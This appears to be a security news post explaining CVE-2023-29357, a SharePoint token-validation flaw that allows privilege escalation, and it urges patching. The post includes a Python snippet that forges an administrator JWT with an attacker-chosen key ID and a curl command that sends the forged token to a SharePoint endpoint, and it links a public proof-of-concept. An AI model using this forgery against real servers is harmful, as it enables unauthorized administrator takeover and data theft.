CVE CyberSecurity Database News

CVE-2023-29357 - Inside the Microsoft SharePoint Server Elevation of Privilege Vulnerability

Poster -

In June 2023, Microsoft patched a critical flaw tracked as CVE-2023-29357 affecting SharePoint Server. This vulnerability was so serious that Microsoft gave it a CVSS (severity) score of 9.8 out of 10, meaning it's about as bad as things can get for enterprise software. Attackers could use it for _elevation of privilege_, granting themselves powerful permissions on a SharePoint site—often enough to fully take over and move deeper into networks.

In this post, we’ll break down CVE-2023-29357 in straightforward American English, show simple code snippets to help you understand the bug, share links to official documentation, and explain how an attacker could exploit it.

Fixed in: June 2023 Patch Tuesday update.

Microsoft’s official advisory:  
Microsoft Security Response Center: CVE-2023-29357

Why Is It Dangerous?

SharePoint is often a critical part of business infrastructure. Anyone who can escalate their privileges on SharePoint can grab sensitive documents, tamper with files, or pivot to other systems within a corporate network.

The core mistake: SharePoint did not properly validate tokens used to authenticate users. In some cases, this let attackers bypass authentication and assume the identity of any user, even administrators.

The Technical Details (Simplified)

At the heart of CVE-2023-29357 is a bug in JSON Web Token (JWT) and access token validation—the code didn’t ensure tokens were truly issued by legitimate trusted sources.

1. SharePoint Uses Access Tokens

SharePoint uses signed tokens (think of them like digital hall passes) to verify that a user is who they claim to be.

These tokens are signed using cryptographic keys known only to the server—so only the server should be able to make a real token.

Example (simplified access token)

{
  "alg": "RS256",
  "typ": "JWT",
  "kid": "trusted-key-id"
}
.
{
  "upn": "admin@domain.com",
  "role": "Administrator"
}
.
[signature]

2. The Vulnerability

Instead of firmly checking if the token was signed by a trusted authority, SharePoint would sometimes just believe the request if the token _looked_ legit, without checking key details.

How is this possible?

Certain endpoints in SharePoint didn’t require that the key used to sign the JWT mapped to SharePoint’s trusted internal issuers. This could let an attacker _choose their own public/private key pair_, add that public key’s ID to the token header (kid), and SharePoint would use the attacker’s key to verify the JWT.

Code snippet for malicious token generation (Python + PyJWT)

import jwt

private_key = """-----BEGIN RSA PRIVATE KEY-----
... attacker’s key ...
-----END RSA PRIVATE KEY-----"""

# Make the payload say “I'm an admin!”
payload = {
    "upn": "admin@domain.com",
    "role": "Administrator"
}

# Custom header, attacker-chosen Key ID
headers = {
    "kid": "attacker-key-id"
}

token = jwt.encode(payload, private_key, algorithm="RS256", headers=headers)
print(token)

The attacker sends this token in an Authorization header to the SharePoint endpoint.

Exploitation in the Real World

- _No authentication needed_: The attacker only needs network access to the SharePoint server (usually by being on the same network/VPN).
- _Payloads_: Attackers gain admin rights, can perform remote code execution, exfiltrate documents, or use SharePoint as a jumping-off point into the internal network.

Proof-of-Concept (PoC)

Security researchers released tools to automate this attack. For instance, the well-known researcher @Glasnt summarized the research, and full writeups were released by Yuki Chen.

Full technical writeup:  
https://medium.com/@yuki_chen/cve-2023-29357-and-sharepoint-security-mitigations-103f8bb10813  
PoC:  
https://github.com/Chocapikk/CVE-2023-29357

Example: sending a forged token with curl

curl -k -H 'Authorization: Bearer <malicious_token>' https://vulnerable-sharepoint-server/_api/web

Patch NOW! The official fix is in the June 2023 cumulative update for SharePoint.

- Microsoft advisory and patch download

Final Thoughts

Every year, software as popular as SharePoint gets hammered by hackers looking for mistakes like CVE-2023-29357. When such a simple validation issue is discovered, attackers jump in fast with real-world exploits. If you haven’t patched your SharePoint Servers since June 2023, you’re at very high risk.

For further reading

- Microsoft Security Advisory CVE-2023-29357
- Yuki Chen’s Technical Blog Post
- NVD National Vulnerability Database

Timeline

Published on: 06/14/2023 00:15:00 UTC
Last modified on: 06/14/2023 03:37:00 UTC